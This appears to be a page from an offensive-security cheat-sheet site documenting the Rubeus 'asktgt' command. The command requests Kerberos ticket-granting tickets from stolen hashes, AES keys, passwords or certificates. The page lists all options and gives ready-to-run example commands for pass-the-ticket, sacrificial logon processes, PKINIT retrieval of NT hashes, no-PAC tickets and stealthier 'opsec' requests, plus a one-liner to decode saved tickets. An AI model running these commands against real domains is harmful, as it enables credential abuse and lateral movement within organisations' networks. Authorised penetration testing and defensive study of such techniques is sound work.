🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🎟️ Rubeus / asktgt

asktgt

Request a Ticket-Granting-Ticket (TGT) from a hash, key, password, or certificate. Sends raw AS-REQ traffic directly to the KDC β€” no LSASS interaction required.

Usage

Rubeus.exe asktgt /user:<username> </password:<password> [/enctype:DES|RC4|AES128|AES256] | /des:<hash> | /rc4:<rc4> | /aes128:<aes128-key> | /aes256:<aes256-key>> [/domain:<domain>] [/dc:<dc-ip>] [/outfile:<output>] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

Options

  • /user:<username> β€” target username
  • /password:<password> β€” plaintext password (defaults to RC4 enctype)
  • /rc4:<rc4> β€” RC4/NTLM hash
  • /aes256:<aes256-key> β€” AES256 key
  • /aes128:<aes128-key> β€” AES128 key
  • /des:<hash> β€” DES key
  • /domain:<domain> β€” FQDN of target domain (defaults to current)
  • /dc:<dc-ip> β€” domain controller FQDN or IP (defaults to current)
  • /enctype:DES|RC4|AES128|AES256 β€” force specific encryption type
  • /ptt β€” pass-the-ticket, apply to current logon session
  • /luid β€” apply to specific logon session (elevated)
  • /outfile:<output> β€” save ticket to file
  • /nowrap β€” don't line-wrap base64 output
  • /opsec β€” send initial AS-REQ without preauth (stealthier)
  • /nopac β€” request TGT without PAC
  • /createnetonly:C:\Windows\System32\cmd.exe β€” create sacrificial process, apply ticket there
  • /show β€” show the created process window
  • /certificate:<path.pfx> β€” use PKINIT certificate authentication
  • /getcredentials β€” retrieve NT hash via U2U after PKINIT
  • /changepw β€” request TGT suitable for Kerberos password change
  • /service:<spn> β€” request service ticket via AS-REQ directly
  • /proxyurl:<url> β€” use KDC proxy (MS-KKDCP)
  • /suppenctype:DES|RC4|AES128|AES256 β€” suppress encryption type

Examples

# RC4 hash, apply to current session
Rubeus.exe asktgt /user:<username> /rc4:<rc4> /domain:<domain> /ptt

# AES256, create sacrificial process (elevated)
Rubeus.exe asktgt /user:<username> /domain:<domain> /aes256:<aes256-key> /createnetonly:C:\Windows\System32\cmd.exe /show

# Password-based
Rubeus.exe asktgt /user:<username> /password:<password> /domain:<domain> /dc:<dc-ip> /ptt

# PKINIT certificate + retrieve NT hash
Rubeus.exe asktgt /user:<username> /domain:<domain> /dc:<dc-ip> /getcredentials /certificate:<path.pfx> /password:<password>

# No PAC
Rubeus.exe asktgt /user:<username> /domain:<domain> /nopac

# For password change (expired password)
Rubeus.exe asktgt /user:<username> /password:<password> /changepw /domain:<domain>

# Save to file
Rubeus.exe asktgt /user:<username> /aes256:<aes256-key> /domain:<domain> /outfile:<output>

Notes

  • No elevated privileges required to request TGTs for the current logon session
  • /luid and /createnetonly require elevation
  • Only one TGT can be applied per logon session at a time with /ptt β€” use /createnetonly to avoid clobbering existing tickets
  • /opsec forces AES256 by default; use /force to override with other enc types
  • Decode saved base64 blob: [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64>"))